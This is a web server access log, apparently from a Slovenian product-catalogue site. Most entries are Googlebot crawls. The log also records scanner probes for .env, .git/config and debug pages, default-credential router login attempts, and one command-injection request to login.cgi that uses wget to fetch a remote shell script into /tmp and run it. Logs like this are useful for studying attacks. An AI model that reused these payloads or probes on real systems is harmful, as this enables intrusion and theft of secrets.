66.249.66.43 - - [05/Oct/2024:17:22:57 +0200] "GET /skupine.php?skupina=105 HTTP/1.1" 200 18656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:17:37:57 +0200] "GET /skupine.php?skupina=42&stran=1 HTTP/1.1" 200 26562 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:17:40:58 +0200] "GET /skupine.php?skupina=42&stran=2 HTTP/1.1" 200 26392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.199.208.231 - - [05/Oct/2024:17:45:55 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
54.199.208.231 - - [05/Oct/2024:17:45:56 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
54.199.208.231 - - [05/Oct/2024:17:45:57 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
54.199.208.231 - - [05/Oct/2024:17:45:57 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
66.249.66.43 - - [05/Oct/2024:17:46:58 +0200] "GET /skupine.php?skupina=42&stran=3 HTTP/1.1" 200 26436 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:17:56:54 +0200] "GET /skupine.php?skupina=95 HTTP/1.1" 200 14813 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:18:00:58 +0200] "GET /skupine.php?skupina=106 HTTP/1.1" 200 23264 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:18:03:59 +0200] "GET /info.php?sifra=1003031&skupina=42 HTTP/1.1" 200 18590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:18:05:59 +0200] "GET /skupine.php?skupina=104 HTTP/1.1" 200 14391 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.83.66.208 - - [05/Oct/2024:18:10:10 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
45.83.65.200 - - [05/Oct/2024:18:10:11 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
66.249.66.44 - - [05/Oct/2024:18:16:00 +0200] "GET /info.php?sifra=1003026&skupina=42 HTTP/1.1" 200 18540 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:18:16:01 +0200] "GET /info.php?sifra=50016&skupina=42 HTTP/1.1" 200 18514 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:18:17:02 +0200] "GET /info.php?sifra=1003032&skupina=42 HTTP/1.1" 200 18667 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:18:17:02 +0200] "GET /skupine.php?skupina=42&stran=4 HTTP/1.1" 200 26587 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:18:17:03 +0200] "GET /skupine.php?skupina=44 HTTP/1.1" 200 26225 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:18:17:03 +0200] "GET /info.php?sifra=52564&skupina=63 HTTP/1.1" 200 17191 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:18:17:03 +0200] "GET /info.php?sifra=52562&skupina=63 HTTP/1.1" 200 17186 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
27.215.239.168 - - [05/Oct/2024:18:19:18 +0200] "POST /HNAP1/ HTTP/1.0" 400 - "-" "-"
66.249.66.42 - - [05/Oct/2024:18:24:04 +0200] "GET /skupine.php?skupina=63&stran=1 HTTP/1.1" 200 24960 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:18:31:04 +0200] "GET /skupine.php?skupina=63&stran=2 HTTP/1.1" 200 20507 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:18:31:05 +0200] "GET /info.php?sifra=08068&skupina=85 HTTP/1.1" 200 18847 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:18:33:05 +0200] "GET /info.php?sifra=16878&skupina=85 HTTP/1.1" 200 18842 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:18:34:06 +0200] "GET /info.php?sifra=236&skupina=89 HTTP/1.1" 200 18719 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:18:46:33 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:19:37:34 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:19:40:34 +0200] "GET /info.php?sifra=kos%20001&skupina=134 HTTP/1.1" 200 17673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:19:44:34 +0200] "GET /info.php?sifra=kos002&skupina=134 HTTP/1.1" 200 17510 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:19:44:35 +0200] "GET /info.php?sifra=50451&skupina=40 HTTP/1.1" 200 17592 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:19:52:36 +0200] "GET /info.php?sifra=50051&skupina=40 HTTP/1.1" 200 17535 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.200.85.68 - - [05/Oct/2024:20:03:01 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 - "-" "-"
66.249.66.43 - - [05/Oct/2024:20:09:55 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:20:38:56 +0200] "GET /info.php?sifra=7121&skupina=44 HTTP/1.1" 200 18272 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.214.27.33 - - [05/Oct/2024:20:40:18 +0200] "GET / HTTP/1.1" 200 20819 "-" "Linux Gnu (cow)"
66.249.66.44 - - [05/Oct/2024:21:21:47 +0200] "GET /info.php?sifra=56151&skupina=40 HTTP/1.1" 200 17481 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.138.42 - - [05/Oct/2024:21:27:10 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.138.42 - - [05/Oct/2024:21:27:17 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.42 - - [05/Oct/2024:21:27:21 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [05/Oct/2024:21:43:47 +0200] "GET /info.php?sifra=E260&skupina=83 HTTP/1.1" 200 18961 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:21:44:58 +0200] "GET /info.php?sifra=4RPP&skupina=31 HTTP/1.1" 200 17705 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:21:47:47 +0200] "GET /info.php?sifra=E650&skupina=83 HTTP/1.1" 200 18919 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:21:47:48 +0200] "GET /kako.php HTTP/1.1" 200 18336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:22:08:25 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:22:08:26 +0200] "GET /info.php?sifra=HDEM135&skupina=86 HTTP/1.1" 200 19474 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:22:12:49 +0200] "GET /info.php?sifra=4749&skupina=42 HTTP/1.1" 200 19043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.230.66.24 - - [05/Oct/2024:22:14:26 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
66.249.66.44 - - [05/Oct/2024:22:27:31 +0200] "GET /info.php?sifra=28641&skupina=87 HTTP/1.1" 200 19072 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:22:55:55 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:22:55:55 +0200] "GET /info.php?sifra=HDEM135&skupina=86 HTTP/1.1" 200 19474 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.193 - - [05/Oct/2024:23:06:20 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.44 - - [05/Oct/2024:23:56:00 +0200] "GET /kontakt.php HTTP/1.1" 200 16457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:01:03:00 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:01:43:54 +0200] "GET /info.php?sifra=4RTO81&skupina=31 HTTP/1.1" 200 17823 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:01:59:55 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:02:09:00 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.139.5.66 - - [06/Oct/2024:03:04:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 226 "-" "linus-torvalds-loves-you"
66.249.66.44 - - [06/Oct/2024:03:44:02 +0200] "GET /pomoc_splosno.php HTTP/1.1" 200 15100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.62.89.80 - - [06/Oct/2024:04:11:35 +0200] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.249.66.43 - - [06/Oct/2024:04:23:55 +0200] "GET /info.php?sifra=50151&skupina=40 HTTP/1.1" 200 17634 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:04:37:55 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:04:46:07 +0200] "GET /info.php?sifra=535009&skupina=31 HTTP/1.1" 200 17731 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.32.170.31 - - [06/Oct/2024:04:53:53 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
66.249.66.43 - - [06/Oct/2024:04:56:55 +0200] "GET /skupine.php?skupina=40&stran=3 HTTP/1.1" 200 25418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:04:57:56 +0200] "GET /skupine.php?skupina=82&stran=1 HTTP/1.1" 200 27505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:00:56 +0200] "GET /info.php?sifra=252150&skupina=82 HTTP/1.1" 200 18954 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:04:57 +0200] "GET /skupine.php?skupina=82&stran=3 HTTP/1.1" 200 27291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:15:57 +0200] "GET /info.php?sifra=MC2131&skupina=82 HTTP/1.1" 200 19159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:18:57 +0200] "GET /skupine.php?skupina=82&stran=5 HTTP/1.1" 200 27860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:19:58 +0200] "GET /skupine.php?skupina=82&stran=6 HTTP/1.1" 200 23526 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:22:58 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:22:59 +0200] "GET /info.php?sifra=dbm020&skupina=82 HTTP/1.1" 200 19195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:23:59 +0200] "GET /skupine.php?skupina=82&stran=2 HTTP/1.1" 200 27376 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:25:00 +0200] "GET /info.php?sifra=064022&skupina=124 HTTP/1.1" 200 17400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:26:01 +0200] "GET /skupine.php?skupina=125 HTTP/1.1" 200 13595 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:27:01 +0200] "GET /skupine.php?skupina=126 HTTP/1.1" 200 15734 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:28:52 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:29:01 +0200] "GET /skupine.php?skupina=39 HTTP/1.1" 200 25623 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:30:02 +0200] "GET /info.php?sifra=4RM&skupina=31 HTTP/1.1" 200 17708 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:35:02 +0200] "GET /slike/7212_m.jpg HTTP/1.1" 200 5818 "-" "Googlebot-Image/1.0"
5.196.102.66 - - [06/Oct/2024:05:38:16 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
66.249.66.42 - - [06/Oct/2024:06:13:56 +0200] "GET /skupine.php?skupina=89 HTTP/1.1" 200 19100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:06:19:46 +0200] "GET /info.php?sifra=50155&skupina=40 HTTP/1.1" 200 17512 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:06:21:56 +0200] "GET /skupine.php?skupina=136&stran=2 HTTP/1.1" 200 22689 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:06:31:56 +0200] "GET /skupine.php?skupina=51 HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
